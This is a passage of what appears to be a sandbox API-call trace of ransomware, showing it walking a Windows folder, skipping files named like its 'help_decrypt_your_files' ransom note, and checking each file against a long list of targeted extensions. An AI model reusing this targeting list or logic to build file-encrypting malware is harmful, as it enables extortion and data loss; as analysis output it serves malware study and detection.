r3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.724] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.725] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.725] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.727] CloseHandle (hObject=0xffffffff) returned 1
	[0167.727] CloseHandle (hObject=0xffffffff) returned 1
	[0167.727] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1
	[0167.728] lstrcmpW (lpString1="ringtones.ico", lpString2="..") returned 1
	[0167.728] lstrcmpW (lpString1="ringtones.ico", lpString2=".") returned 1
	[0167.728] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.728] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="ringtones.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"
	[0167.728] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99
	[0167.728] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.728] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 0x63
	[0167.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.729] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.729] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"
	[0167.729] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99
	[0167.729] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.729] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.729] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.729] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.730] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.730] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ico", cAlternateFileName="")) returned 1
	[0167.730] lstrcmpW (lpString1="settings.ico", lpString2="..") returned 1
	[0167.730] lstrcmpW (lpString1="settings.ico", lpString2=".") returned 1
	[0167.730] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.730] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="settings.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"
	[0167.730] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98
	[0167.730] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.731] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 0x62
	[0167.731] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.731] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.731] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"
	[0167.731] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98
	[0167.731] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.731] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.732] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.732] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.732] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.p